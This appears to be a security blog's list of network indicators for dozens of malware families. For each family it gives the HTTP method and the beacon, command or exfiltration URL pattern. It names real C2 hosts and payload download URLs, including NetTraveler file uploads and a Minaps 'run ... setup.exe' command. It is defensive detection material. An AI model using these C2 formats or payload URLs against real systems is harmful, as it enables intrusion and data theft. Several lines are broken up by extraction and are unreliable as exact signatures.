APT MiniASP GET /record.asp?device_t= &key=&device_id=&cv=&result=
APT Miniduke POST /index.php
APT Mirage POST /resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow
APT Mirage – later var GET /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg
CRIME Money loader GET /get_xml?file_id=25227372
/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536
APT Mongal GET /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000
000000000000000000000000000 0000
APT Murcy GET /150828
APT Netravler GET /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT
APT Netravler GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt
APT Netravler GET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end
/nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1-
APT NfLog GET /IElog/TestURL.asp HTTP/1.0
APT NfLog POST /NfLog/Nfile.asp
APT NTESSESS GET /6K8gL8.html
APT PNG trojan GET /index.htm
APT Poison Ivy GET 256 bytes of seemingly random data after a successful
TCP handshake, then 48 byte “keep-alive” requests
APT RedOctober AuthInfo POST http://%s:%s%s
APT RedOctober Sysinfo POST /cgi-bin/nt/sk
APT RegSubDat POST /5501000000/log
APT Sanny / Win32.Daws POST /write.php
APT Seasalt GET /postinfo.html
APT Sofacy POST /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01
APT Sofacy POST /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
CRIME Srizbi GET /cb_4.exe
CRIME Stabuniq POST /rssnews.php
APT Sykipot / Wyksol GET /kys_allowget.asp?namegetkys.kys
APT Taidoor GET /apzsr.php?id=021793111D309GE67E
APT Tarsip Eclipse GET /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0
APT Tarsip Moon GET /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230
CRIME Tbot tor n
CRIME Tinba aka Zusy POST /h/index.php
APT Vinself POST /w880/T19R17Q16/12010L11014
CRIME Vobfus GET /XEuPCLrf?e
APT WEBC2-Bolid GET /firefox.html
APT WEBC2-Clover GET /Default.asp
APT WEBC2-CSON GET /Default.aspx?INDEX=10_random_characters>
APT WEBC2-CSON Response to commands POST /Default.aspx?ID=IMNQRSSRXK
APT WEBC2-HEAD GET /
APT WEBC2-Table GET /order.htm
CRIME Xpaj POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh
APT Xtreme Rat GET /1234567890.functions
APT Xtreme Rat GET /1234567890.functions
CRIME Zeus Gameover GET /search.php?page=73a07bcb51f4be71
CRIME BitcoinMiner POST {“id”: 1, “method”: “mining.subscribe”, “params”: [“suckerrr/2.3.2”]}
CRIME Blazebot IRC NICK USA|94576
USER vtptdwd 0 0 :USA|94576
CRIME Nurjax Adware GET /services/rules.txt?dummy=916
CRIME Tosct GET Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV
CRIME Nocpos GET POST /check/echo
/check
CRIME OnionDuke GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=
s/sysinfo_7.php
/forum/phpBB3/prx_26.php
APT Lagulon (Operation Cleaver) POST /contador/server.php
/i/server.php
/includes/server.php
APT? Medusa POST %s/bbc_mirror/%s/search?id=%s
/CNN_Mirror/EN/%s/search?id=%s
|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00
CRIME Toopu GET /toopu.png
/%s:1048%s
/num3.html
/web/get_ad3.asp?type=loadall&machinename= -6C78A9C3&cr=yes
/num3_51la.asp
CRIME Twerkin GET /classes/functions.php?functionname=online
/classes/functions.php?functionname=getupda
tes
/classes/functions.php?functionname=getcommand
CRIME TzeeBot / TinyZBot POST /checkupdate.asmx
CRIME XLS URLDownload ToFileA function for Dridex GET /koh/mui.php
CRIME Quervar / Induc.C / Dorifel GET /js/way.php?00021708&pin=7DF38AD66C78A9C3
/404/way.php?00038F50&pin=7DF38AD66C78A9C3
/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3
/1.php?JXU9WXFG&pin=DEC09603F4CEFD80
CRIME Feidowns downloader / Kilim (?) / Cracktools GET yeniadmin.php?os=WindowsXP
/yeniadmin.php?os=Windows7&osbit=64&antiv
/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI
http://whos.amung.us/pingjs/?k=yenikazi
CRIME GameVance Adware GET /aj/updtah.php
CRIME OpenShopper Adware GET //mmsv/Access3.php
//opendb/mmsv.php
//mmsv/Access2.php
/opapp/postmedia1/Update.dat
/opapp/postmedia1/OKUpdate.exe
CRIME SoftPulse Adware GET /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D
CRIME FakeAV GET /[…]/load.php?file=uploader
/[…]/load.php?file=grabbers
/[…]/load.php?file=1
/ohwgx3kiTh/document.doc
/ohwgx3kiTh/load.php?file=0
CRIME Wauchos (download by Zbot of Cridex) POST /ssdc32716372/file.php
/auto*.it/*/jeve.exe
//dd*.ru/old.exe
CRIME Blackenergy DDos Bot POST id=[bot_id]&bid=[base64_encoded_build_
id]&dv=[x]&mv=[y]&dpv=[z]
id=[bot_id_sha1]&bid=[base64_encoded_build_
id]&nm=[x]&cn=[y]&num=[z]
The only major difference is that the id field contain just
the hash instead of the actual string
CRIME Alurewo / Alureon pay per click GET /click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5
CRIME OSX Wirelurker GET mac/getversion.php?sn=
CRIME Systweak Adware – Systweak RegClean Pro & Advanced System Protector GET /getipaddress.asp
CRIME MPlug / Multiplug Adware GET /?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0&
page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7
371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436
02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E
+L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro
w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd%
2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+
-+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod
e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_
redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo
ut_id= 8&project_name=TusFiles&uuid=%252A
CRIME Nemucod JS GET /document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939
1
CRIME Andromeda / Wauchos POST /and/gate.php
CRIME Poweliks click-fraud GET /click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0
CRIME Poweliks click-fraud GET /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9
CRIME Yoddos / Darkshell / YoYoDDoS 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u… ……..
APT Cobra / Turla POST /%s/%s?
uid=%d&context=%s&mode=text&data=%s
APT Panda POST /forum/login.cgi
APT Panda POST /Photos/Query.cgi?loginid=
APT Aided Frame GET /img/js.php
APT Scanbox Watering hole framework POST /i/recv.php
CRIME Blackenergy DDos Bot GET /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php
APT Syria Twitter. apk POST /contacts
APT TinyBaron / Miniduke / CosmicDuke GET /modules/db/mgr.php?
/modules/db/mgr.php?F=3?
CRIME? Moure GET /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=
/HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k
/HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n
/G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr
/GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu
/FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k
CRIME Vundo GET /webhp
/wpad.dat
CRIME / APT Lostdoor RAT INFO||LostDoor-001|Remote PC|| Windows XP Professional||511.56 MB|No|C:WINDOWSsystem32cmd.exe|2:13:42
APT Protux worm POST ” http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3
http://202.71.136.14:80/ggBwkFNqDu1869.avi
/newTroy.jpg”
/http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3
CRIME Conficker / Kido worm GET / ip checking services
CRIME Dingu / Proxy GET /1.jpg
http://webemail
.bounceme.net:8080/directget42.gif
CRIME Dyre GET /1/manualec.pdf
CRIME Zeus GET /ycJ2Jj7r4t3wc6y4/ali.jpg
CRIME Cryptowall POST /tpnofu223t8h8dl
CRIME Cryptowall POST /4175iq691v3l
GET /raw
CRIME Galapoper / Tibs Downloader GET /pic/tool.jpg
/pic/search.jpg
/pic/tibs.jpg
/pic/proxy.jpg
/pic/winlogon.jpg
APT Wykcores GET /279843
/279859
/280015
/287171
/315171
/110937
/111968
/113000
/114031
/115062
ADV Ads – Zenovia Digital Exchange (not necessarily malicious) GET /?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs
CRIME EsFury worm GET http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA
http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT
CRIME PornoAsset / LockEmAll Ransomware GET /a.php?f=647&e=2
CRIME FakeAV Privacy Center GET /dfgsdfsdf.php
/mf.php
/css/new-mobile.css
/js/wsjs.js
/js/caf.js
CRIME Zeus V2 (drop zone, config) GET / POST /panel3/gotobank.php
/panel3/ppnl3.exe
/panel3/ppnl3.bin
/ppnl3.bin
CRIME Blathla / Cadro adware GET /1.gif
CRIME Vundo / Krap POST /
CRIME Vundo / Krap POST /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA
CRIME VOlk bot GET /WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1
User-Agent: vb wininet
Host: portalcinemark.us
CRIME Oficla / Sasfis GET /21/download.php?expid=0&fid=1
/s/download.php?expid=4&fid=1
/l1/bb.php?v=200&id=554905388&b=9468674099&tm=3
/dmr/bb.php?v=200&id=554905388&b=OLD&tm=3
/np/load.php?spl=hcp&b=ff&o=xp&i=hcp
/phpbb/image2/cp.php?i=15
APT Pingbed GET /default.htm
/default1.htm
/default2.htm
APT Minaps backdoor GET / POST /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko
/download/logo.png
/download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A
POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi
CRIME QHost / Orsam / Bicololo GET /stat/tuk/183

Share this post

Share on facebook
Share on linkedin
Share on print
Share on email

Subscribe to our Monthly Cyber Security Digest

Get monthly content to keep you up to date on the latest news and tips